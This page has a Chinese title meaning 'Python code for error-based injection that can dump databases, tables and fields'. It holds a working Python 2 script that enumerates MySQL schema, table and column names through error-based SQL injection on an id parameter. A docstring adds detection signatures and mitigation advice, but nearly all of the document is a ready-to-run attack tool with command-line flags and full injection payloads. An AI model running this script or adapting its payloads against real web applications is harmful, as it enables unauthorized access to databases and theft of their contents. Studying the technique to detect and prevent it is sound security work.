基于报错注入的Python代码


能够爆数据库,表,和字段的基于报错注入的Python代码

"""Reference sample of an error-based SQL injection enumerator (Python 2 syntax).

Every request puts a crafted value into the ``id`` query parameter and then
parses the HTTP response body for a value wrapped in ``:::`` (``0x3a3a3a``).
The script therefore only works against an application that interpolates
``id`` straight into a MySQL query *and* renders the resulting database
error text back to the client.

Defender's notes (what this page is useful for):

* Detection: the literal fragments ``information_schema.COLUMNS``,
  ``floor(rand(0)*2)``, ``0x3a3a3a``, ``group by a)b`` and the ``--+``
  comment terminator appearing in a request's query string are a strong
  signature for this technique in access logs and WAF rules.
* Mitigation: bind ``id`` as a query parameter instead of concatenating it,
  never echo raw database error messages into responses, and run the
  application with a least-privilege database account.

Note: this file is Python 2 code (``print`` statements, ``xrange``,
``binascii.b2a_hex`` on ``str``); it does not run unchanged on Python 3.
"""
import re
import sys
import requests
import binascii


def Get_db(url):
    """Enumerate schema names visible through ``information_schema.COLUMNS``.

    ``url`` is the target endpoint without a query string; the script appends
    ``?id=`` followed by the payload itself.

    The first request asks for the count of distinct ``table_schema`` values
    and parses it from the ``:::<digit>:::`` marker in the response body.
    Each loop iteration then retrieves one schema name via ``limit n,1``.
    All output goes to stdout; nothing is returned.
    """
    url_dbs_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct table_schema) from information_schema.COLUMNS),0x3a3a3a)a from information_schema.tables group by a)b --+"
    resp = requests.get(url_dbs_num)
    html = resp.content
    # The count is expected to be echoed inside the page between the two
    # ``:::`` markers, i.e. the DB error text is reaching the client.
    db_num = int(re.search(r':::(\d?):::',html).group(1))
    print "Database number : %d" % db_num
    for n in xrange(0,db_num):
        # One request per schema name; ``limit %d,1`` selects the n-th row.
        url_dbs_table = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct table_schema from information_schema.COLUMNS limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % n
        resp = requests.get(url_dbs_table)
        html = resp.content
        db_name = re.search(r':::(.*?):::',html).group(1)
        print db_name


def Get_table(url,db_name):
    """Enumerate table names of schema ``db_name`` via ``information_schema``.

    ``db_name`` is first rewritten as a MySQL hex literal (``0x...``) so the
    schema name can be embedded in the ``where table_schema=`` clause
    without quote characters. Same request/parse pattern as ``Get_db``:
    one request for the count, then one request per table name.
    Prints to stdout; returns nothing.
    """
    # binascii.b2a_hex on a Python 2 str; the "0x" prefix makes it a MySQL
    # hex literal.
    db_name = "0x" + binascii.b2a_hex(db_name)
    url_tables_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct table_name) from information_schema.COLUMNS where table_schema=%s),0x3a3a3a)a from information_schema.tables group by a)b --+" % db_name
    resp = requests.get(url_tables_num)
    html = resp.content
    tables_num = int(re.search(r':::(\d?):::',html).group(1))
    print "tables number : %d" % tables_num
    for n in xrange(0,tables_num):
        url_tablename = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct table_name from information_schema.COLUMNS where table_schema=%s limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name,n)
        resp = requests.get(url_tablename)
        html = resp.content
        table_name = re.search(r":::(.*?):::",html).group(1)
        print table_name


def Get_column(url,db_name,table_name):
    """Enumerate column names of ``db_name``.``table_name``.

    Both names are rewritten as hex literals before being placed in the
    ``where table_schema=... and table_name=...`` clause. Same
    count-then-iterate pattern as ``Get_db`` / ``Get_table``.
    Prints to stdout; returns nothing.
    """
    db_name = "0x" + binascii.b2a_hex(db_name)
    table_name = "0x" + binascii.b2a_hex(table_name)
    url_columns_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select count(distinct column_name) from information_schema.COLUMNS where table_schema=%s and table_name=%s),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name,table_name)
    resp = requests.get(url_columns_num)
    html = resp.content
    columns_num = int(re.search(r":::(\d?):::",html).group(1))
    print "Columns number : %d" % columns_num
    for n in xrange(0,columns_num):
        url_columns_name = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,(select distinct column_name from information_schema.COLUMNS where table_schema=%s and table_name=%s limit %d,1),0x3a3a3a)a from information_schema.tables group by a)b --+" % (db_name,table_name,n)
        resp = requests.get(url_columns_name)
        html = resp.content
        column_name = re.search(r":::(.*?):::",html).group(1)
        print column_name


def main():
    """Dispatch on positional ``sys.argv`` flags.

    Recognised shapes (argument order is fixed, no parser is used):
    ``<url> --dbs``, ``<url> -D <db> --tables``,
    ``<url> -D <db> -T <table> --columns``.
    ``sys.argv`` is indexed without a length check, so a shorter command
    line raises ``IndexError``; an unrecognised shape does nothing.
    """
    if sys.argv[2] == '--dbs':
        Get_db(sys.argv[1])
    elif sys.argv[2] == '-D' and sys.argv[4] == '--tables':
        Get_table(sys.argv[1],sys.argv[3])
    elif sys.argv[2] == '-D' and sys.argv[4] == '-T' and sys.argv[6] == '--columns':
        Get_column(sys.argv[1],sys.argv[3],sys.argv[5])


if __name__ == '__main__':
    main()